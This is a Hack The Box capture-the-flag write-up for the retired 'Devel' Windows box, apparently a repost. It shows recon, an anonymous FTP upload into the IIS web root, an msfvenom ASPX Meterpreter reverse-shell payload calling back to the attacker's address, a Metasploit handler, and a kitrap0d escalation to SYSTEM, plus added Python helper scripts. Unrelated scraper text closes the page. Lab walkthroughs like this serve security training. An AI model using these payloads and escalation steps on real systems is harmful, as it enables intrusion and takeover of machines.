Keep Calm and Hack The Box - Devel
Hack The Box (HTB) is an online platform that lets you test your penetration testing skills. It contains several challenges that are constantly updated. Some of them simulate real-world scenarios and some of them lean more towards a CTF style of challenge.
Note. Only write-ups of retired HTB machines are allowed.
Devel is described as a relatively simple box that demonstrates the security risks associated with some default program configurations. It is a beginner-level machine which can be completed using publicly available exploits.
We will use the following tools, run from a Kali Linux box, to pwn the machine:
- nmap
- zenmap
- searchsploit
- metasploit
- msfvenom
Step 1 - Scanning the network
The first step before exploiting a machine is to do a little bit of scanning and reconnaissance.

This is one of the most important parts, as it determines what you can try to exploit afterwards. It is always better to spend more time on that phase to get as much information as possible.
I will use Nmap (Network Mapper), which is a free and open source utility for network discovery and security auditing. It uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.
There are many commands you can use with this tool to scan the network. If you want to learn more about it, you can have a look at the documentation here.
I use the following command to get a basic idea of what we are scanning:

nmap -sV -O -F --version-light 10.10.10.5

-sV: Probe open ports to determine service/version info
-O: Enable OS detection (needs raw sockets, so run nmap as root or with sudo)
-F: Fast mode - scan fewer ports than the default scan
--version-light: Limit to the most likely probes (intensity 2)
10.10.10.5: IP address of the Devel box
You can also use Zenmap, which is the official Nmap Security Scanner GUI. It is a multi-platform, free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users.
I use a different set of options to perform an intensive scan:

nmap -A -v 10.10.10.5

-A: Enable OS detection, version detection, script scanning, and traceroute
-v: Increase verbosity level
10.10.10.5: IP address of the Devel box
If you find the results a little bit too overwhelming, you can move to the Ports/Hosts tab to only get the open ports.
We can see that there are 2 open ports:

- Port 21. File Transfer Protocol (FTP) control (command). Here it's a Microsoft FTP server
- Port 80. Hypertext Transfer Protocol (HTTP). Here it's an IIS server

The most likely initial attack vector appears to be the FTP in this case.
Step 2 - The vulnerable FTP
We open Firefox and visit the website at http://10.10.10.5

From the reconnaissance phase, we found 2 files under the Microsoft FTP (the intensive scan's script scan lists the FTP directory once anonymous login succeeds). Let's see if we can access them from the browser.

I can access the welcome.png image file by visiting

http://10.10.10.5/welcome.png

I can also access the iisstart.htm page

http://10.10.10.5/iisstart.htm

We now know two things:

- The FTP root is the document root of the web server - discovered when we accessed the files from the recon phase.
- The FTP allows anonymous login - discovered when we performed the intensive scan.
Let's see if we can create a file and add it to the FTP.

I create a file with this command, redirecting the output to a file called htb.html

echo HackTheBox > htb.html

I then check with ls that the file has been created, and look at its content with

cat htb.html

Let's now connect to the FTP to add our test file. To connect to the FTP, I use this command

ftp 10.10.10.5

I type anonymous as the username and just press enter for the password, as the server allows anonymous login.

I am now connected to the FTP. I add the file on the FTP with this command

put htb.html

The file has been successfully sent over. Let's check if we can access it from Firefox. I visit the page and we can see the output HackTheBox on the web page.

http://10.10.10.5/htb.html

Now that we know we can send over files, let's craft an exploit!
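The check above (anonymous FTP upload, then fetch the same file over HTTP) is the whole finding of this step, so here it is as a small script. This is an added example, not code from the original article: it parses the ftp-anon output that nmap's script scan prints, uploads a random marker file over anonymous FTP, fetches it over HTTP to prove the FTP root is the web root, and deletes the marker afterwards so no artefact is left behind. The nmap sample is constructed in the shape ftp-anon prints for a Microsoft FTP server; the directory entry and file sizes are illustrative, and the target host and ports are assumed to be the article's (10.10.10.5, 21, 80).

```python
"""Added example: confirm that an anonymous-writable FTP root is the IIS web root."""
import ftplib
import io
import re
import secrets
import sys
import urllib.error
import urllib.request

# Constructed sample in the shape of nmap's ftp-anon script output (not real scan data).
SAMPLE_NMAP = """\
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd
"""

# One entry of the DOS-style directory listing that Microsoft ftpd returns.
_ENTRY = re.compile(r"^(\d{2}-\d{2}-\d{2})\s+(\d{2}:\d{2}[AP]M)\s+(<DIR>|\d+)\s+(.+)$")


def parse_ftp_anon(nmap_output):
    """Return (anonymous_allowed, [(name, is_dir), ...]) from nmap -A / -sC output."""
    anonymous = False
    entries = []
    in_listing = False
    for raw in nmap_output.splitlines():
        line = raw.strip().lstrip("|_").strip()   # drop nmap's "| " / "|_" script gutter
        if line.startswith("ftp-anon:"):
            anonymous = "Anonymous FTP login allowed" in line
            in_listing = True
            continue
        if not in_listing:
            continue
        m = _ENTRY.match(line)
        if m is None:
            break                                  # first non-entry line ends the listing
        entries.append((m.group(4).strip(), m.group(3) == "<DIR>"))
    return anonymous, entries


def probe_webroot(host, ftp_port=21, http_port=80, timeout=10):
    """Upload a random marker over anonymous FTP, fetch it over HTTP, then delete it.

    Returns True when the HTTP body equals what we uploaded: the FTP root is the
    web root, so anything we put there is served (and an .aspx file is executed).
    """
    name = "probe_%s.txt" % secrets.token_hex(4)   # random name: never clobber a real file
    body = secrets.token_hex(16).encode()           # random body: rules out a cached page
    ftp = ftplib.FTP(timeout=timeout)
    ftp.connect(host, ftp_port)
    ftp.login("anonymous", "anonymous@example.com")
    try:
        ftp.storbinary("STOR " + name, io.BytesIO(body))
        try:
            url = "http://%s:%d/%s" % (host, http_port, name)
            served = urllib.request.urlopen(url, timeout=timeout).read()
        except urllib.error.HTTPError as exc:
            print("HTTP %d for %s" % (exc.code, name), file=sys.stderr)
            served = None
        return served == body
    finally:
        try:
            ftp.delete(name)                        # clean up; the server may refuse it
        except ftplib.all_errors:
            print("could not delete %s, remove it by hand" % name, file=sys.stderr)
        try:
            ftp.quit()
        except ftplib.all_errors:
            ftp.close()


if __name__ == "__main__":
    allowed, entries = parse_ftp_anon(SAMPLE_NMAP)
    print("anonymous login:", allowed, "entries:", entries)
    if len(sys.argv) > 1:                           # python3 probe.py 10.10.10.5
        print("FTP root is web root:", probe_webroot(sys.argv[1]))
```

Run it with the target address as the only argument; without an argument it only parses the embedded sample. The delete at the end is the part people forget during an engagement: the random marker is harmless, but it still should not stay on the box.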
Step 3 - Using MSFvenom to craft an exploit
We will use MSFvenom, which is a payload generator. You can learn more about it here.

But first, let's check in the Metasploit Framework which payload we will need to craft our exploit.
We know that we need to create a reverse shell, a type of shell in which the target machine connects back to the attacking machine. The attacking machine has a listener port on which it receives the connection, and over that connection code or command execution is achieved.

The reverse TCP shell should be for Windows, and we will use Meterpreter.
From the Offensive Security website, we get this definition for Meterpreter:

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

You can read more about Meterpreter here.
I launch Metasploit and search for reverse TCP payloads. I use the following command

search windows/meterpreter/reverse_tcp

We find an interesting payload (number 2 in my output; the index depends on your Metasploit version), which is a Reverse TCP Stager. This payload injects the meterpreter server DLL via the Reflective DLL Injection payload and connects back to the attacker

payload/windows/meterpreter/reverse_tcp

Now let's go back to msfvenom to craft our exploit, and more specifically an ASPX reverse shell. This choice comes from the recon phase: the web server is IIS, which executes ASP.NET (.aspx) pages placed in its document root.
I use the following command

msfvenom -p windows/meterpreter/reverse_tcp -f aspx -o devel.aspx LHOST=10.10.14.15 LPORT=4444

-p: Payload to use
-f: Output format
-o: Save the payload to a file
LHOST: Local host (the attacker's address on the HTB VPN interface, tun0, not the LAN address)
LPORT: Local port
I then check with ls that the file has been created. It's time to send it over to the FTP.

Let's reconnect to the FTP and send our little gift!

I connect to the FTP, enter anonymous as the username, and skip the password by pressing enter. I then send the file with the following command

put devel.aspx

Let's check if the file has been correctly sent over. Going back to Firefox, I navigate to the FTP server with the following URL

ftp://10.10.10.5

We can see that our little gift is here!

Here is the exploit, if you're curious to know what it looks like.
Step 4 - Setting up a listener with Metasploit
Back in Metasploit, I use the following command to select the payload handler

use exploit/multi/handler

I check which options are available (show options). We first set the payload, which must match the one given to msfvenom

set payload windows/meterpreter/reverse_tcp

Then the LHOST

set lhost 10.10.14.15

And finally the LPORT

set lport 4444

If we check the options now, we should see that everything is set up. Let's run the exploit. After this message appears

Started reverse TCP handler on 10.10.14.15:4444

go back to the browser and request the page where the malicious script is hosted, so that IIS executes it

http://10.10.10.5/devel.aspx

You should then see a Meterpreter session created.
Now that I have a session, I try to look for the first flag, user.txt, using the following command in meterpreter

search -f user.txt

No files match my search. I try with .* to see other files, but nothing useful. (As it turns out later, the flags on this box are named user.txt.txt and root.txt.txt, so a wildcard search such as search -f user.txt* would have matched.)

I then create a shell with the following command

shell

I use the following command to get the system information

systeminfo

We can see that the registered owner is called babis. This might be an important piece of information when we look for the user flag. We can also see that the machine doesn't have any hotfixes.

I start navigating through the folders. I use dir to list all files/folders and cd to change directory. I try my luck on the babis and Administrator folders, but both give me Access denied.

We need to escalate privileges! Knowing that no hotfixes were found when we checked the system information, we can try to find exploits applicable to this machine.
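The three facts pulled out of systeminfo above (registered owner, architecture, hotfix list) are exactly what decides the next step, so here they are parsed programmatically. This is an added example, not code from the article: it parses systeminfo output into a dictionary and derives the same hints the article reaches by eye. The sample output is constructed in the shape systeminfo prints; the owner (babis), the x86 system type and the empty hotfix list are what the article reports, the other values (host name, OS name and build) are illustrative.

```python
"""Added example: parse `systeminfo` output and derive the privesc hints the article uses."""
import re

# Constructed sample in the layout systeminfo prints (values illustrative, see lead-in).
SAMPLE_SYSTEMINFO = """\
Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
Registered Owner:          babis
System Type:               X86-based PC
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
"""

_KEY_VALUE = re.compile(r"^([A-Za-z()/ ]+?):\s*(.*)$")      # "Key:   value" lines
_HOTFIX = re.compile(r"^\s+\[\d+\]:\s*(KB\d+)")              # "   [01]: KB1234567" lines


def parse_systeminfo(text):
    """Return a dict of systeminfo fields plus a 'hotfixes' list of KB numbers."""
    info = {}
    hotfixes = []
    in_hotfixes = False
    for line in text.splitlines():
        m = _HOTFIX.match(line)
        if in_hotfixes and m:                 # indented continuation of Hotfix(s)
            hotfixes.append(m.group(1))
            continue
        in_hotfixes = False
        m = _KEY_VALUE.match(line)
        if m is None:
            continue                          # other continuation lines (NICs, etc.)
        key, value = m.group(1).strip(), m.group(2).strip()
        info[key] = value
        in_hotfixes = key == "Hotfix(s)"
    info["hotfixes"] = hotfixes
    return info


def privesc_hints(info):
    """The checks the article makes before escalating, as a list of strings."""
    hints = []
    if not info["hotfixes"]:
        hints.append("no hotfixes listed: unpatched OS, run post/multi/recon/local_exploit_suggester")
    if info.get("System Type", "").lower().startswith("x86"):
        hints.append("32-bit Windows: exploit/windows/local/ms10_015_kitrap0d is a candidate (x86-only module)")
    else:
        hints.append("64-bit Windows: the kitrap0d module is x86-only, skip it")
    owner = info.get("Registered Owner")
    if owner:
        hints.append("registered owner %r: look for C:\\Users\\%s" % (owner, owner))
    return hints


if __name__ == "__main__":
    parsed = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print("owner:", parsed.get("Registered Owner"), "| type:", parsed.get("System Type"),
          "| hotfixes:", parsed["hotfixes"] or "none")
    for hint in privesc_hints(parsed):
        print("-", hint)
```

Paste the real systeminfo output into a file and call parse_systeminfo on its contents; on a patched host the "Hotfix(s)" line reads "N Hotfix(s) Installed." followed by one indented "[nn]: KB..." line per patch, which the parser collects into the hotfixes list.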
Step 5 - Performing Privilege Escalation
I put the session in the background with this command

background

I then use the following module

use post/multi/recon/local_exploit_suggester

This module suggests local Meterpreter exploits that can be used. The exploits are suggested based on the architecture and platform of the session the user has open, as well as the exploits available in Metasploit.

I check the options and set the session (set SESSION to the ID shown by sessions -l).

It's important to note that not all local exploits will be fired. Exploits are chosen based on these conditions: session type, platform, architecture, and required default options.

Going down the list
exploit/windows/local/bypassuac_eventvwr

fails because the IIS user is not part of the administrators group, which is the default and to be expected (a UAC bypass only helps when the current user is already an administrator running at medium integrity).

I use the next exploit on the list, which is

use exploit/windows/local/ms10_015_kitrap0d

This module will create a new session with SYSTEM privileges via the KiTrap0D exploit by Tavis Ormandy. If the session in use is already elevated then the exploit will not run. The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows.

When we ran sysinfo in the Meterpreter session, it revealed that the target was x86 architecture, so this module applies.

I check the options, set the session, and run the exploit.
The exploit was successful, but the session couldn't be created. This is because the module set up its reverse handler on the default interface (eth0) and default port, rather than on the HTB VPN interface (tun0), as the first line of its output shows:

Started reverse TCP handler on 10.0.2.15:4444

I check the options, set LHOST to the VPN address (10.10.14.15) and LPORT, and run the exploit again.
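The wrong-interface mistake above is the same LHOST choice that Step 4 got right by hand, so here is one script that covers both: picking LHOST from the VPN interface, writing the multi/handler resource script, and catching the connection with a plain TCP listener (what `nc -lvnp` or the handler does at the socket level). This is an added example, not code from the article or from Metasploit. It assumes the VPN interface is named tun0 and the LAN one eth0 (the article's addresses 10.10.14.15 and 10.0.2.15); the `ip -4 -o addr` sample is constructed, and the "target" in the self-test is a client on localhost, not a real reverse shell.

```python
"""Added example: choose LHOST from the VPN interface, build the handler .rc, catch one connection."""
import re
import socket
import subprocess
import threading

# Constructed sample of `ip -4 -o addr` output on a Kali VM connected to the HTB VPN.
SAMPLE_IP_ADDR = """\
1: lo    inet 127.0.0.1/8 scope host lo\\       valid_lft forever preferred_lft forever
2: eth0    inet 10.0.2.15/24 brd 10.0.2.255 scope global dynamic eth0\\       valid_lft 86400sec preferred_lft 86400sec
5: tun0    inet 10.10.14.15/23 scope global tun0\\       valid_lft forever preferred_lft forever
"""

_ADDR_LINE = re.compile(r"^\d+:\s+(\S+)\s+inet\s+(\d+\.\d+\.\d+\.\d+)/\d+")


def lhost_for_iface(ip_output, iface):
    """Return the IPv4 address of iface from `ip -4 -o addr` output, or None if absent."""
    for line in ip_output.splitlines():
        m = _ADDR_LINE.match(line)
        if m and m.group(1) == iface:
            return m.group(2)
    return None


def handler_rc(payload, lhost, lport):
    """Resource script reproducing the article's Step 4; run with: msfconsole -r handler.rc"""
    return "\n".join([
        "use exploit/multi/handler",
        "set PAYLOAD " + payload,          # must match the -p given to msfvenom
        "set LHOST " + lhost,
        "set LPORT " + str(lport),
        "set ExitOnSession false",         # keep listening for the second (elevated) session
        "exploit -j",
        "",
    ])


class Catcher:
    """Minimal listener: the attacker side of a reverse shell, one connection."""

    def __init__(self, bind_host, port):
        self.srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.srv.bind((bind_host, port))
        self.srv.listen(1)
        self.port = self.srv.getsockname()[1]   # real port when port 0 was requested

    def accept(self, timeout=None):
        self.srv.settimeout(timeout)
        return self.srv.accept()                 # (client socket, peer address)

    def close(self):
        self.srv.close()


def first_line(sock, timeout=5):
    """Read up to the first newline the connecting side sends (e.g. its cmd.exe banner)."""
    sock.settimeout(timeout)
    buf = b""
    while b"\n" not in buf:
        chunk = sock.recv(4096)
        if not chunk:
            break
        buf += chunk
    return buf.split(b"\n", 1)[0].rstrip(b"\r").decode(errors="replace")


def loopback_selftest():
    """Play both sides on localhost: listener waits, 'target' connects back and speaks."""
    catcher = Catcher("127.0.0.1", 0)
    got = {}

    def attacker_side():
        client, _peer = catcher.accept(timeout=5)
        with client:
            got["line"] = first_line(client)

    t = threading.Thread(target=attacker_side)
    t.start()
    with socket.create_connection(("127.0.0.1", catcher.port), timeout=5) as target:
        target.sendall(b"hello from the target\r\n")   # constructed stand-in for a shell banner
    t.join(5)
    catcher.close()
    return got.get("line")


if __name__ == "__main__":
    try:
        live = subprocess.run(["ip", "-4", "-o", "addr"], capture_output=True, text=True).stdout
    except FileNotFoundError:                      # not on Linux: fall back to the sample
        live = ""
    lhost = lhost_for_iface(live, "tun0") or lhost_for_iface(SAMPLE_IP_ADDR, "tun0")
    print(handler_rc("windows/meterpreter/reverse_tcp", lhost, 4444))
    print("loopback self-test received:", loopback_selftest())
```

Saving the printed script as handler.rc and starting msfconsole -r handler.rc gives the same listener as Step 4, bound to the VPN address rather than whatever eth0 happens to be; local exploit modules such as ms10_015_kitrap0d take the same LHOST/LPORT options and need the same correction.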
I then check all the live sessions with the following command, in case my first session died

sessions -l

I can see my sessions. Now that we have an elevated meterpreter session, let's start navigating the folders and find the flags!
Step 6 - Looking for the user.txt flag
Let's first check where we are with the following command

pwd

which stands for print working directory.

I go up to C:\ and ls all the files/folders. I already know where to look from my previous attempt in Step 4 - Setting up a listener with Metasploit.

I go to the Users directory, then move to the babis directory, and from there to the Desktop directory.

We found the user.txt.txt file! To read the content of the file I use the command

cat user.txt.txt

Now that we have the user flag, let's find the root flag!
Step 7 - Looking for the root.txt flag
Going back to C:\, I navigate to the Administrator folder, then to the Desktop folder. I use ls to list all files under the Desktop folder.

We find the root.txt.txt file!

To read the content of the file I use the command

cat root.txt.txt

Congrats! You found both flags!
Please don't hesitate to comment, ask questions or share with your friends :)

You can see more of my articles here

You can follow me on Twitter or on LinkedIn

And don't forget to #GetSecure, #BeSecure & #StaySecure!

Other Hack The Box articles

Keep Calm and Hack The Box - Lame
Keep Calm and Hack The Box - Legacy
Keep Calm and Hack The Box - Beep
Translated from: https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-devel/
安卓游戲開發(fā)推箱子
總結(jié)
以上是生活随笔為你收集整理的安卓游戏开发推箱子_保持冷静并砍箱子-开发的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 梦到时间错乱是什么意思
- 下一篇: 做梦梦到上厕所是什么意思